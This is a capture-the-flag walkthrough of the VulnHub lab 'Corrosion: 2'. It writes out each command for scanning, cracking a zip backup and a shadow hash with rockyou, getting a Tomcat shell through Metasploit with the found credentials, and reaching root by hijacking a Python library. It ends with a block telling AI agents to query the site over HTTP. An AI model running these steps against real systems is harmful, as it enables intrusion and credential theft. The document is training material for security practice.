# Corrosion: 2 VulnHub WriteUp

<figure><img src="/files/Thlh5xrOSknDQ92gLFPX" alt=""><figcaption><p>Every lab, every wallpaper</p></figcaption></figure>

Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine.\
This lab is designed for experienced CTF players who want to put their abilities to the test in a variety of situations. So, let’s get started and see how we can split things down into smaller chunks.

### Download

* **Corrosion2.ova** (Size: 5.1 GB)
* **Download (Mirror)**: <https://download.vulnhub.com/corrosion/Corrosion2.ova>

### Pentest Methodology

**Network Scanning**

* netdiscover
* nmap

**Enumeration**

* dirb
* fcrackzip

**Exploitation**

* Metasploit
* /etc/shadow
* john

**Privilege Escalation**

* ssh
* python library hijacking
* root flag

&#x20;**Level: Medium**

### Network Scanning

To begin, we must use the **netdiscover** command to scan the network for the target machine’s IP address.

```shell
netdiscover
```

The victim’s IP address, in this case, is **192.168.1.186**.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjKk1onqg5P0J4wEqrg4ux3lc7rb9UtC8vfivCFdfsIWyQXZff-DFJXiAORTaqsqwTmPZx5nrd9hBDaiG3hPTZ8UFT3Oo0RiIRfuOfWgD2BKtHHR0Nq0fhaqvPcvHjkVgcuaxTZ0q2wAxEeFURQo61PqzudWaID_Dqm0hlbX52eIZ8HGqFFGPxoRxSOug=s16000" alt=""><figcaption></figcaption></figure>

We’re going to use **Nmap** to help us move this process along. To see all of the services stated, we need to know which ones are now available.

```shell
nmap -sV 192.168.1.186
```

According to the nmap output, we have:

* An SSH server is available on port 22.
* On port 80, there is an HTTP service (Apache Server).
* On port 8080, a Tomcat server is running on port 8080.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjFUCr4h9LxT6BnsA6tAhdUYzdpcVrnUI9dMyHNW65zRm6Odv3JxSeuXttNbWqmF_7wS7PFdHxEd7LJet4JxN_W-1gzH5KvwK_B_l-iy_kPEuy7tdCbx7jj2d3zwAEuGZbHCpC1uyk_tWVxUoDYloT-ssTtryBPvXfFzWJHHfN-N65fZLvmdnLxAySTOw=s16000" alt=""><figcaption></figcaption></figure>

### Enumeration

Let’s begin by looking at the http service on port **80**. There’s nothing strange about that; it’s just an **Apache server page.**

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEj54r-dtA2Td_EreVBny2CnBsqg297VfT88nOhnFmg8CJirwXme8CkHlvtf9Q6mfDTbMAkajh6wNryxyw_eEE6fZTz2rHTC6GOHQ56AnElwXg3auNh8NBw4u7vPpmGpSVx_MstpZgd0WfPykQ0niRWjC7TBGkyyuEw9Z03lW15eJarU_B1iAT74Ikt0cg=s16000" alt=""><figcaption></figcaption></figure>

Next, we looked at the **Tomcat server**, which was listening on port **8080**. It’s a straightforward page with nothing suspicious on it.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEh3LcjmoRYHLidzX4MvSY4eMlxzhe02gpg_pLtCWnvdQ2B12kObNphP-JASceSs5iQVxle417G3m2XQBJ6gL_wvhxl4_rOI5tRlsgBlvqbxMFYEG87n9UePZtLcuwhlcAOkwPOFpX8gGCBQ7_1f7fk5wv-HVRJBSFWXJumH-YgbHhN0tfzINefS2mzFyg=s16000" alt=""><figcaption></figcaption></figure>

We discovered nothing harmful on websites. So, to continue further in this experiment, we use the **dirb** directory brute force method to find some knowledge. Smash!! We discovered a directory containing a **backup zip file**.

```bash
dirb http://192.168.1.186:8080/ -X .php,.zip
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEivYUcRnvTmVMoAefYSQDiTk8ObWNULLNYpj3evT59FuIoO39u2GOqtfpypZ8-jv676-H0X2UxmF7EgkYr3MtNPplBZlwye3F405YGP522yoZPMV0x8462KI5de3jiyiEMLwb5LE-fmhvMc_sq28uA_qki39HqOKIXOofn_eiFBICTC08GFWfSYJQVQlA=s16000" alt=""><figcaption></figcaption></figure>

The **backup zip file** is then downloaded using the **wget** command. Following that, we attempted to study this file, but it was **password protected**.

{% code lineNumbers="true" %}

```shell
wget http://192.168.1.186:8080/backup.zip
unzip backup.zip
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEgM1XNQw9_EzbADCJTb-wlaBJEoQisGsd3EeAY1cBkKj1i2ajrzdytKfXAruWt_CGAiN5V69FQ86WmEUwrxmxDhIZhwn1X9ky52RWBf2PUa_MvNsnLb_9TExlMPwc-g19QJI6Ized9Hg9DVa_MWHLr2yjWk8xWWWCHDYVH4f6t0alPwsRoQ3-qR3SjJDQ=s16000" alt=""><figcaption></figcaption></figure>

Next, we’ll use the **fcrackzip** utility to crack this password. It is a lightweight, open-source zip file password cracker. The **rockyou** word-list is used for the brute force attack. Boom!! We cracked its password in a matter of seconds **(@administrator\_hi5).**

`fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip`

Then we use this password to unzip the **backup zip** file. We attempt to inspect each and every file contained in this backup zip file. We are now inspecting the **tomcat users xml** file.

{% code lineNumbers="true" %}

```shell
unzip backup.zip
cat tomcat-users.xml
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEi9oeyicwDyWMaMCXtq8RGEi-3zD-Socl4-ycbU3avaccjVA8ORsboGgevbnVkWiGfk8NMoIDJaGIpRbwjJ7z-EmNjqn1kD8gJB1e3C0M8UpKEdNYlkSQRr7gkWHQrk0Ms1BO2Nb0BlfHaws77hoHjEk6jp_2_MxRDffc-EyaLM7oJJ1aUNf9wBDpwB0w=s16000" alt=""><figcaption></figcaption></figure>

Bam!! We discovered user **admin** and password **melehifokivai** credentials.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiztI5WuE5M1_Sta3tZ4waTHkdHBo0_OI1dj7bTeRexWODqUoJdjAPSScZzecjTDPV6Ku2cn9ut9fN3WL2z2m3WpU-xebq5qyTgwz_VrW2-L9U5NthHKHVmT-exmHL0iyXK-nwbJ4RDFBt2gLPDiVVAjO8v5xdyl4sQV_c66rTZ_10MplcGLch38Pji7g=s16000" alt=""><figcaption></figcaption></figure>

### Exploitation

Now that we have the credentials, we can begin exploiting them using a **Metasploit**. In these instances, employing a **Tomcat exploit** is the best option. Then give us all the information we need to use it, and we’re ready to go. As you can see, we had a **meterpreter session**.

{% code lineNumbers="true" %}

```shell
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.1.186
set rport 8080
set httpusername admin
set httppassword melehifokivai
exploit
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiGj92boUJBX0CVzYS9bromIAyIbcd9DXHHI4d01HBaoxvecun1NG_gPY2nTe6RJxvxGBL2qejkOXnnfTn1jmnymcOSvCjtqZMgCOM9os9qRN4uh5iMMkBg77kzughkaXU9_3U-Z28d1LAwrryfMKlBmpKhmzHoY1-eoO2FXUxAyIyljhFrdCCI7ISkvg=s16000" alt=""><figcaption></figcaption></figure>

We just switched the directory to home. We discover that we have two users in this lab, **Jaye** and **Randy.** We switched to user **jaye.** It has the same password **(melehifokivai)** that we found out earlier.

{% code lineNumbers="true" %}

```shell
cd /home
ls
su jaye
ls
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjLEtiMgoOVz41sveSwTcw9xL7noY5ySUHyHSlBraS1-w31TjtdcEyZzes2B2uXc-as0XWzKUG5Axev7J1nLMUwZaa8koA3yV7GbLeskWw-67iunRaR8LctAP8QMU-nJIbbDCr0_0qCKlppcIT2KVWaJ4vSjjscYEvUW_H25ky34IwIj41uP_FRsHxjCg=s16000" alt=""><figcaption></figcaption></figure>

We discovered that this individual has a **look** called the .program that allows us to locate any file. As a result, we use it to locate the **/etc/shadow file**. Boom!! We obtained the **hash values** of all users in this lab.

```shell
./look '' /etc/shadow
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiGjTeUA-Fyk-xVvS2Qql9rYylMJ2p1eIZIGQoFLPa3w5WqxnWajuvmvmcpDC8YiLKaCxCMbUFIm04a0yVRUjz4j0eEvmG9EljhS5yA_OE3iHTESgQXRyup1oXfBN6cIKQiPCpFCk1oLClF6jvQbrFqq6dfT0UJkCgcd5qOdvsyRIwUp0ZmA8QwBiFMcw=s16000" alt=""><figcaption></figcaption></figure>

As you are aware, we already have the password for user Jaye. We copy user **randy’s hash value** and save it in a file called hash.

Using **John,** who is a specialist in this case, we try to crack that hash. In a matter of seconds, we cracked the password **07051986randy.**

```shell
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiMkuQCR3EMVH468xCy-YLUkoxS79qXoJDul_x_8ztOOx_lRN63aL9tb0p22erD4bjFPFfIuHvLtHKfkREBGJeN3DaxI5J5uHnG_gJJ1OGcueaE8QdN4H3lx4QnNrR73fo3JXPJ4CtBFUDprxT7Q8gWlalTA1myJXtaefyYiv6bjt9SQPqKnyH5NOonJw=s16000" alt=""><figcaption></figcaption></figure>

### Privilege Escalation

Now, we have all of the necessary information to begin privilege escalation. To login via ssh as user **randy,** we use the cracked password **07051986randy.**

```shell
ssh randy@192.168.1.186
```

Then we used the **(sudo -l)** tool to examine this user’s limits. We discovered that it can be abused by **python library hijacking**.

The **randombase64.py** python code can be used to perform this **hijacking**. which imports another file called **base64.**

{% code lineNumbers="true" %}

```shell
sudo -l
cat /home/randy/randombase64.py
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiGJlFibtP3Rvm68cwnmhjBuC_ZPfKErWxwLaPX3IpTS0i2rrmAvDOCRkAuasFz6HS7Sv5H0b8TeHq6mMcaIr5NAybVRxmRKh8LYjzX3sYsXUgfcqJ5_qRGhAu5YKLKDAHAg5kdpelVpqgU7KKjq3JV00E3V8sRa63JENSNehirkJxVkq7YePWI85nHoA=s16000" alt=""><figcaption></figcaption></figure>

To obtain base64 file coordinates, we use the **locate** command. In a couple of seconds, we discover its coordinates. We investigated the file’s restrictions. Using this file, we can gain **root access.**

{% code lineNumbers="true" %}

```shell
locate base64
ls -la /usr/lib/python3.8/base64.py
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEgFMMm8JJSJRUVQJbI1a6sGv641vEY4n2_9nv0MygnQPelYbVgQLIMtsidOL26Js6ezCTVnLUnq4MWmApfRVBpsgXtu-cg4PNnEV04fIbhYlRs7DZ3pDoYp62UUBXQnRtCIcnoXwfS0dwdMSPRufkHZj-9kqlwK2inNAva_heFvzOhvcIVF7t8clgDzQg=s16000" alt=""><figcaption></figcaption></figure>

We made some changes to this **base64 python file** using the nano command. Add this code to get **root access** to the victim’s machine.

```python
import os
os.system ("/bin/bash")
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEi-6EwkZ9qHj9FD6Wg8PG1pbJnqtf1aZFLv8dqgEKSRI-rD5EuOl59qYmVEiEVPmqC2hJRnk7vgLbFuOAWeXJrCm_8pMIATGcaOFn1h4llwn_0VrI8BdBfb6z3_FRwRp6qCizRwS3C_-7Ja3oOZFUtOJlowQK39jgzKGpMgt53kvIrAtcwGqcpy97b4Vg=s16000" alt=""><figcaption></figcaption></figure>

We are now coordinating the use of both **Python files.** Boom!! We obtained root access. We immediately changed the directory to **root** and received the **root flag** in a matter of seconds.

{% code lineNumbers="true" %}

```shell
sudo /usr/bin/python3.8 /home/randy/randombase64.py
cd /root
cat root.txt
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhBRjkN4kBHQLrByzbtz8vywMGjzDtnFEX9Y-W7TGt1PH4BgX7aWC6MsBcOuY0HInPf5JEBCyIKuCcmNT1QCidFWwVwL4QOyJG-NqXH2JyGzMQcEb3kvSk4Ff0L9U0gJ5U5Lydgb-1FjT-oOZ7aCVeWqqrDiReTUU2IVe-CBxrQyRewoPvXo-EUAqgC1g=s16000" alt=""><figcaption></figcaption></figure>

This was a fantastic lab with a lot of information, especially in the enumeration and privilege escalation areas. It is worthwhile to attempt to gain CTF experience. Hopefully, this walk-through should have taught you something new.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.loliteam.net/my-hacking-materials/corrosion-2-vulnhub-writeup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.